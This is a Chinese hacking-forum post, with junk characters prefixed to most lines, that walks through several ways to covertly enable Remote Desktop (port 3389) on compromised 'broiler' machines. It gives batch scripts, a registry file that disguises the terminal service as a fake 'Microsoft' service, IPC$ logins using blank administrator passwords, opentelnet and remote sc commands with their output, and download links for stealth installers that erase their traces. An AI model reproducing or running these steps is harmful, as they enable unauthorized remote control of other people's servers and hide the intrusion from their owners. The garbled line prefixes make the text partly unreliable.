[hide=60] 1.打开记事本,编辑内容如下:
[u7 vY@ echo [Components] > c:\sql
u7n[f@Eg,% echo TSEnable = on >> c:\sql
wLpkUa sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
Q%I#{+OT 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
=MCNCV/< ^DzL$BX 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
XzW7eO,A 地址:
www.netsill.com/rots.zip i,([YsRuou 使用方法:
Ny.*G@& 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
=w?M_[&K) wZ$tJQO c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
WN$R[N AvyQ4xim+ 服务端口: 设置终端服务的服务端口。默认是3389。
) @!~8<_" 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
5/tj 使用/fr表示强制重起目标。(如果/r不行,可以允哉飧觯?BR>使用此参数时,端口设置不能忽略。
qZXyi'(d 比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
] xb]8] 运行CMD(2000下的DOS),我们给它开终端!
L'13BRu` 命令如下!
`b#/[3 cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
Y 5Qb4Sa 上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以 /r,这是普通重启)
+mivqR~{{ M8\G>0Hc6 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
1$);V,DK! 因为pro版不能安装终端服务。
VPWxHVf 如果你确信脚本判断错误,就继续安装好了。
tp#Z@5= XIqv{w 如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
GXarUj s O|?Z~ 脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
mr@_%U 1a5?)D y>@v>S 3,下载3389自动安装程序-djshao正式版5.0
be&6kG 地址
www.netsill.com/djshao.zip Rl y jOf{0 说明:
NR;q`Xe- 解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\ winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
Q.rB\8ea Uy(vELB 特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持非法内容,请删除韩繁四个版本的win2000服务器版!
w}IL
8L(D cC b>zI qnabw F 4.下载DameWare NT Utilities 3.66.0.0 注册版
h~,x7]w6 地址
www.netsill.com/dwmrcw36600.zip F<h&3 安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
tU9rCL:P 复制启动后出现对方桌面。
%|#P&` 在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK。
UVc>i9,0 D_O 5k|-V R"m.&%n 5.
yonJd 3js)niT9u 首先我们制作开启3389的工具
g@$0FY{Q 先把下面的注册表内容copy一份,另存为3389.reg注册表文件
^fA3<| 注册表内容:
K.:6YXVs< Windows Registry Editor Version 5.00
Z|]l"W*w [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
nvU+XCx "Enabled"="0"
sL!;hKK [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
({*.!ty "ShutdownWithoutLogon"="0"
{%]NpFg#b [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
~J8cS "EnableAdminTSRemote"=dword:00000001
,m #@%fa [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
OU0xZ=G "TSEnabled"=dword:00000001
+W V@o' [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
b|X>3( "Start"=dword:00000002
T+&x{+gZ [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
qg_>`Bv"a "Hotkey"="1"
7VEt4 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
27h/6i3 "Start"=dword:00000002
sW>P- "ErrorControl"=dword:00000001
m
_t(rn~f6 "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
H;7O\ 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
Wh#_9); 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
`~w%Jf "ObjectName"="LocalSystem"
*X-~TC0
[ "Type"=dword:00000010
Sa?~t3*H "Description"="Microsoft"
TE*> a5C| "DisplayName"="Microsoft"
9*GL@_c 再把下面的内容保存为批处理文件3389.bat
<a4iL3 安装批处理内容:
lB5[#z copy termsrv.exe eventlog.exe
&lXx0"-$ regedit.exe /s 3389.reg
-9tXv+v? del 3389.reg
n:}MULy; del 3389.exe
4fU5RB7% del 3389.bat
6Dr$*9 用winrar制作成exe自解压缩包
0ER6cTo-t -r6(=A 61.188.***.*** user:administrato pass:空
;X9MA=b 先使用工具letmein判断其操作系统
h0y\,iWXb letmein \\ip -all -d
IdQwLt TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
#b]}cwd! 再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
Oy?iAQ+ 应该没有开启了
i?P]}JENM 建立ipc连接
h!JjN$ copy工具过去
d ~Z:$&r net use \\ip\ipc$ "pass" /user:name
K|Ij71 copy file \\ip\admin$\system32
|Ls&~'ik 用opentelnet开对方的telnet
-Z\UYt opentelnet \\ip name pass 1 99
I5|S8d< 用telnet进入
'nmYB:&! 进入到对方的winnt\system32\
><Mbea=U+ 目录
.DV#-tUh 解压缩3389.exe
ND99g 运行安装批处理3389.bat
!O%f)v? 现在我们把对方重起一下,用reboot
JzS^9)& JOE{&^j `P)64So-1 w4&v( m 802]M 7.
P[|BWNei \gPNHL* 检查对方是否真的禁用了Terminal server
=tvm= C:\>sc \\xxx.xxx.xxx.xxx qc termservice
1J!tcj1( [SC] GetServiceConfig SUCCESS
9M-]~.O SERVICE_NAME: termservice
`A}{
I}xq TYPE : 10 WIN32_OWN_PROCESS
ph|2lLZ START_TYPE : 4 DISABLED
1>O0Iu ERROR_CONTROL : 1 NORMAL
N[?4yV2s BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
n6-!@RYr LOAD_ORDER_GROUP :
w|U@jr*H] TAG : 0
B'#gs'fl DISPLAY_NAME : Terminal Services
neMe<jr DEPENDENCIES :
8aM%
9OU SERVICE_START_NAME : LocalSystem
!z&seG]@ 仔细看 START_TYPE一项,显示对方该服务的启动模式为“DISABLED”也就是“禁用”。
R/KWl^oNj IEKX'+t' OG<]`!" C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
?[|4QzR [SC] ChangeServiceConfig SUCCESS
7$!Bq# 好了,现在我们已经把对方终端服务的启动模式修改成自动了。
$AJy^`E^ vXWESy ]H@uuPT! }v|[h[cZ 再检查一便对方终端服务的启动模式
7*8nUq C:\>sc \\TEST qc termservice
ki/Lf4 [SC] GetServiceConfig SUCCESS
XS~w_J#q SERVICE_NAME: termservice
<k8rSxn{ TYPE : 10 WIN32_OWN_PROCESS
#JT%]! START_TYPE : 2 AUTO_START
u*YuU%H= ERROR_CONTROL : 1 NORMAL
sT8kVN|Uv BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
5D@Q1 LOAD_ORDER_GROUP :
7!d<>_oH TAG : 0
pmXWI`s DISPLAY_NAME : Terminal Services
Iw-6Z+ 94 DEPENDENCIES :
*g_>eNpXD SERVICE_START_NAME : LocalSystem
Fu=VY{U4 9"v ox 9<#R;eIsv J'&?=| 启动对方的终端服务
\$++.%0 C:\>sc \\xxx.xxx.xxx.xxx start termservice
4w SERVICE_NAME: termservice
rEyMSLN TYPE : 10 WIN32_OWN_PROCESS
cN(QTbyl6Q STATE : 2 START_PENDING
d=Ihl30m (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
>L3p qK
WIN32_EXIT_CODE : 0 (0x0)
(#>5j7i8# SERVICE_EXIT_CODE : 0 (0x0)
w@D@,q'x CHECKPOINT : 0x1
iDe0 5f1R WAIT_HINT : 0x7530
J-,X0v"
fN/KXdAy& Z-=7QK.\{ C:\>sc \\xxx.xxx.xxx.xxx query termservice
uX!y,a/" SERVICE_NAME: termservice
_J#Hq 'K TYPE : 10 WIN32_OWN_PROCESS
5 BG&r*U STATE : 4 RUNNING
I(eR3d: (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
*^m.V= WIN32_EXIT_CODE : 0 (0x0)
h!3Z%M SERVICE_EXIT_CODE : 0 (0x0)
7
@Qlp$[F CHECKPOINT : 0x0
cnO4NUDv WAIT_HINT : 0x0[/hide]